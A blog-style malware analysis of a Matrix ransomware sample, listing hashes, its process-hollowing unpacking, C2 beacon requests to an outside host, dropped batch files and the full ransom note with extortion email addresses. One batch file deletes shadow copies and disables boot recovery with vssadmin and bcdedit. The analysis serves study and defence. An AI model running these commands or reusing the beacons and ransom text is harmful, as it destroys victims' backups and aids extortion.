New Malware sample : Trojan-Ransom.Win32.Matrix.ac

Ransomware Matrix

Being up very early today I could not withstand the urge to pull another malware/virus sample from malwr.com.

I downloaded the following sample (which it now seems to be a second generation Matrix Ransomware variant):

SHA1 58a6234d3c6aed251b09b8f54611d9679c84af55
SHA256 e7b3102e3e49c6c3611353d704aae797923b699227df92d97987a2e012ba3f25

The malware analysis done on malwr.com shows a big variation in naming the sample, also no network traffic is seen in the network analysis section. Some similarities between the Antivirus vendors are the following names: Graftor, GenKryptik and Ransom Matrix.

The behavioral analysis shows that this executable starts some new processes with random names.

I have run the sample multiple times and the spinned up processes indeed seem to have a random name.

The Graftor sample, let’s just call it that way for minimal SEO purposes 🙂 uses the following order to load a first round unpacked executable in a new process with the same name as the initial executable: CreateProcessA, GetThreadContext, SetThreadContext followed by ReadProcessMemory and WriteProcessmemory. The WriteProcessmemory takes place in multiple loops.

Dumping the memory located in the ECX register gives me a dump which needs to be edited with a hex editor to make it a valid PE32 executable. There is a lot of ” junk” placed before the MZ signature that needs to be removed in order to make it a valid executable.

Ransomware Matrix

Removing all the data before the MZ signature will give you the following file:

PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

SHA1 2c1b0fb35c8d4d2ce28190dc5e0ceeabddad35dc

SHA256 cf6ebd60cd7c46a0c17dc192322f4cd4fc93b44add0dae17abb0d6c0c203cf9e

The UPX unpacked file has a SHA256 of 3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

Virustotal shows a 17/61 detection ration for this sample. Kaspersky seems to mis it. The most common trojanname is vmHfa4YZuwfi . From the signature you can see that this time there is some network traffic. There are some request to a web api running on statcs.s76.r53.com.ua (31.41.216.90)

Sample of Ransomware Matrix network traffic:

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=WIN_5.1_32|ADMIN_YES|INT_0 HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=START HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=MASTER_STARTED HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=PREPARING HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

If you look at the GET request you see that the request follow a certain order that indicates the phase in which the local process is running.

More content will be added to this post because I only dumped the process, modified the dumped file to get a valid executable, unpack the sample and run it in virustotal and run it on malwr.com. Next is to let the new sample run to see what the end result is (is it some ransomware, a trojan, a backdoor?) and to debug is further in Olly.

Update:

Allright, part 2. I have loaded the unpacked malware sample into the debugger to see what it is about. Looking at the imported functions one can tell that it looks like the sample is probably also ransomeware. (some encryption functions and some filefind functions).

The Ransomware Matrix Dropped Files.

The sample creates a directory in C:\Users\*username*\AppData with the name faLI4zd2GZRK which is followed by creating a file that will be started used cmd.exe

SHA256: 3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

The common denominator between the recognized names is Ransomware Matrix, although the consistency between the antivirus vendors is big. (MSIL/MATRIX VARIANT)

Starting this file will spin a lot of processes. Mainly by using cmd.exe

6zZUGDT8.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\AAJQuHI7.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\AAJQuHI7.exe”

23Qn6rcH.cmd (cleanup)

ping -n 3 localhost

del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\YtzyQMj2.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\YtzyQMj2.exe”

bclFRufv.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\Gxu5OE8o.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\Gxu5OE8o.exe”

lUGRjier.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\uuNj0saB.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\uuNj0saB.exe”

OFZFP9q6.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\BqfAUxVQ.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\BqfAUxVQ.exe”

P7E4WtUK.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\zjVeqooM.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\zjVeqooM.exe”

qp3h899p.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\iRj4g0sE.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\iRj4g0sE.exe”

RMG5LL7V.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\psnwTLzb.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\psnwTLzb.exe”

tJxQTMw0.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\m1n0Sdz5.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\m1n0Sdz5.exe”

WnRddttG.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\n9RwW8GD.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\n9RwW8GD.exe”

adlo5t9M.cmd (disables shadow copies, disables boot to recovery and remove shadow copies)

echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
ping -n 30 localhost
wmic.exe process call create “cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures”
echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
ping -n 10 localhost
cmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
ping -n 10 localhost
echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
vssadmin.exe delete shadows /all /quiet
echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK

Besides all the executables dropped in the temp folder there are also some other executables dropped and loaded. All 3 files are exactly the same -> Ransomware Matrix

tEajMFBE.exe

3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

Trojan-Ransom.Win32.Matrix.ac

gvfkQqDU.exe

3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

Trojan-Ransom.Win32.Matrix.ac

GGIU63mQ.exe

3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

Trojan-Ransom.Win32.Matrix.ac

Dropped Ransomware Message

Аttеntiоn! Аll yоur filеs wеrе еnсryрtеd with RSА-2048 аlgоrithm.
Withоut уоur pеrsоnаl dесrуptiоn kеy dаtа rеcоvеrу is impоssiblе!
Tо gеt yоur uniquе kеy аnd dесrурt thе filеs, Yоu hаvе to sеnd thе fоllоwing cоdе:
COSLb0cVd9bCx1vp-3D425A556DA60F50
tо оur е-mаil аddrеss: bluetablet9643@yahoo.com
Thеn Yоu will rеciеvе аll nеcеssаry instruсtiоns.
Yоu hаvе оnlу 96 hоurs tо rеcоvеr yоur dаtа! Аftеr this timе yоur uniquе dесrурtiоn kеy will bе аutоmаticаllу dеlеtеd аnd filе dесrурtiоn will bеcоmе imроssiblе!
Hurrу uр! Еасh 12 hоurs thе pауmеnt sizе will bе аutоmаticаllу inсrеаsеd bу 100$!
Аll thе аttеmpts оf dесryptiоn by yоursеlf will rеsult оnly in irrеvосаble lоss оf yоur dаtа.
If yоu still wаnt tо try tо dеcrypt thеm by yоursеlf plеаsе mаkе а bаckup аt first bеcаusе thе dесryptiоn will bеcоmе impоssiblе in cаsе оf аny chаngеs insidе thе filеs.
If yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаil fоr mоrе then 24 hours (аnd оnly in this cаsе!), usе thе rеsеrvе е-mаil аddrеss:
decodedecode@yandex.ru

The Ransomeware note shown in the background looks like this:Ransomware Matrix

Some more files which are created (or dropped) by Matrix Ransomware.

A file with an unique ID which has a code “b264-4739-96de-e3df2c740a1e” and my system name in it. Also most files end up being encrypted with the following extension added odbg201.zip.b10cked

Leave a Reply

Your email address will not be published. Required fields are marked *

14 + eighteen =